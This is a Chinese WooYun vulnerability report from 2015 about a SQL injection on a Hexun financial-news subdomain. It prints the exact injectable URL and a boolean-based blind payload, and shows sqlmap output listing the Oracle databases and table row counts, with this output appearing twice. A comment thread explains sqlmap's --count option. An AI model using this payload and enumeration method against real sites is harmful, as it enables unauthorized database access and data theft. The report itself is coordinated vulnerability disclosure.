缺陷编号:WooYun-2015-0125699
漏洞标题:和讯网某分站SQL注射漏洞之和讯网某分站(明文账号密码)
相关厂商:和讯网
漏洞作者:安全小飞侠
提交时间:2015-07-09 17:31
公开时间:2015-08-23 17:34
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开
请叫我安全小飞侠,谢谢!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
http://baidu.hexun.com/report/ifread.php?t=1&id=617695注射参数: idURI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an<br> y)? [y/N] N<br> sqlmap identified the following injection points with a total of 81 HTTP(s) requ<br> ests:<br> ---<br> Parameter: #1* (URI)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: http://baidu.hexun.com:80/report/ifread.php?t=1&id=617695 AND 7598=<br> 7598<br> ---<br> [16:04:00] [INFO] testing MySQL<br> [16:04:01] [WARNING] the back-end DBMS is not MySQL<br> [16:04:01] [INFO] testing Oracle<br> [16:04:01] [INFO] confirming Oracle<br> [16:04:02] [INFO] the back-end DBMS is Oracle<br> back-end DBMS: Oracleavailable databases [9]:<br> [*] BDFIN<br> [*] CTXSYS<br> [*] EXFSYS<br> [*] MDSYS<br> [*] OLAPSYS<br> [*] REPDBO<br> [*] SYS<br> [*] SYSTEM<br> [*] WMSYS |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
+------------------------+---------+<br> | Table | Entries |<br> +------------------------+---------+<br> | FUTURES_QUOTE | 26984041 |<br> | R_STOCKS_SECTOR | 3604361 |<br> | TB_HJ_TTJ | 2477437 |<br> | TB_STOCK_BOARD | 2215113 |<br> | VOTE | 2186237 |<br> | TB_SGE_QUOTE | 1463523 |<br> | TB_METAL_QUOTE | 1438797 |<br> | USA_STOCK_QUOTE_TMP | 1067821 |<br> | R_INFO_O | 1029189 |<br> | TB_STOCK_BOARD_INDEX | 865135 |<br> | R_INFO | 597134 |<br> | TB_TJS_FS | 525422 |<br> | TB_METAL_QUOTE_FX678 | 497540 |<br> | CS_TNCONT | 152035 |<br> | TB_STOCK_BOARD_MONITOR | 64100 |<br> | USA_STOCK_QUOTE | 48146 |<br> | TB_SW_HQ | 25045 |<br> | CODE_INFO | 22329 |<br> | STOCK_BOARD | 4311 |<br> | STOCK_BOARD_MONITOR | 4295 |<br> | R_STOCK | 4225 |<br> | R_INFO_2 | 3970 |<br> | TB_TJS_K | 2012 |<br> | R_SECTOR_TDX | 1986 |<br> | VOTE_MI | 925 |<br> | R_GRADE | 645 |<br> | USA_STOCK_CODE | 442 |<br> | R_INDUSTRY | 345 |<br> | CT_USERINFO | 289 |<br> | TRADINFO | 270 |<br> | CS_TNCONT_NEW | 209 |<br> | R_INSCODE | 146 |<br> | R_SECTOR | 134 |<br> | CS_TNCONF | 123 |<br> | MEMBER_STOCKS | 43 |<br> | FUTURES_CODE | 27 |<br> | AD_KB | 26 |<br> | TEST | 25 |<br> | MEMBER_STOCK_TRADE | 13 |<br> | MEMBER_STOCK_GROUPS | 11 |<br> | RP_TEST | 9 |<br> | ACCOUNT | 6 |<br> | REPORT_USER_ACCOUNT | 5 |<br> +------------------------+---------+ |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
http://baidu.hexun.com/report/ifread.php?t=1&id=617695注射参数: idURI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an<br> y)? [y/N] N<br> sqlmap identified the following injection points with a total of 81 HTTP(s) requ<br> ests:<br> ---<br> Parameter: #1* (URI)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: http://baidu.hexun.com:80/report/ifread.php?t=1&id=617695 AND 7598=<br> 7598<br> ---<br> [16:04:00] [INFO] testing MySQL<br> [16:04:01] [WARNING] the back-end DBMS is not MySQL<br> [16:04:01] [INFO] testing Oracle<br> [16:04:01] [INFO] confirming Oracle<br> [16:04:02] [INFO] the back-end DBMS is Oracle<br> back-end DBMS: Oracleavailable databases [9]:<br> [*] BDFIN<br> [*] CTXSYS<br> [*] EXFSYS<br> [*] MDSYS<br> [*] OLAPSYS<br> [*] REPDBO<br> [*] SYS<br> [*] SYSTEM<br> [*] WMSYS |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
+------------------------+---------+<br> | Table | Entries |<br> +------------------------+---------+<br> | FUTURES_QUOTE | 26984041 |<br> | R_STOCKS_SECTOR | 3604361 |<br> | TB_HJ_TTJ | 2477437 |<br> | TB_STOCK_BOARD | 2215113 |<br> | VOTE | 2186237 |<br> | TB_SGE_QUOTE | 1463523 |<br> | TB_METAL_QUOTE | 1438797 |<br> | USA_STOCK_QUOTE_TMP | 1067821 |<br> | R_INFO_O | 1029189 |<br> | TB_STOCK_BOARD_INDEX | 865135 |<br> | R_INFO | 597134 |<br> | TB_TJS_FS | 525422 |<br> | TB_METAL_QUOTE_FX678 | 497540 |<br> | CS_TNCONT | 152035 |<br> | TB_STOCK_BOARD_MONITOR | 64100 |<br> | USA_STOCK_QUOTE | 48146 |<br> | TB_SW_HQ | 25045 |<br> | CODE_INFO | 22329 |<br> | STOCK_BOARD | 4311 |<br> | STOCK_BOARD_MONITOR | 4295 |<br> | R_STOCK | 4225 |<br> | R_INFO_2 | 3970 |<br> | TB_TJS_K | 2012 |<br> | R_SECTOR_TDX | 1986 |<br> | VOTE_MI | 925 |<br> | R_GRADE | 645 |<br> | USA_STOCK_CODE | 442 |<br> | R_INDUSTRY | 345 |<br> | CT_USERINFO | 289 |<br> | TRADINFO | 270 |<br> | CS_TNCONT_NEW | 209 |<br> | R_INSCODE | 146 |<br> | R_SECTOR | 134 |<br> | CS_TNCONF | 123 |<br> | MEMBER_STOCKS | 43 |<br> | FUTURES_CODE | 27 |<br> | AD_KB | 26 |<br> | TEST | 25 |<br> | MEMBER_STOCK_TRADE | 13 |<br> | MEMBER_STOCK_GROUPS | 11 |<br> | RP_TEST | 9 |<br> | ACCOUNT | 6 |<br> | REPORT_USER_ACCOUNT | 5 |<br> +------------------------+---------+ |
你懂的,抓紧修复吧
危害等级:高
漏洞Rank:15
确认时间:2015-07-0917:33
谢谢
暂无
@安全小飞侠 Table | Entries | entries 这个参数怎么显示??
@DloveJ --count 参数
@安全小飞侠 嗯嗯,,谢谢,ok
原文连接
的情况下转载,若非则不得使用我方内容。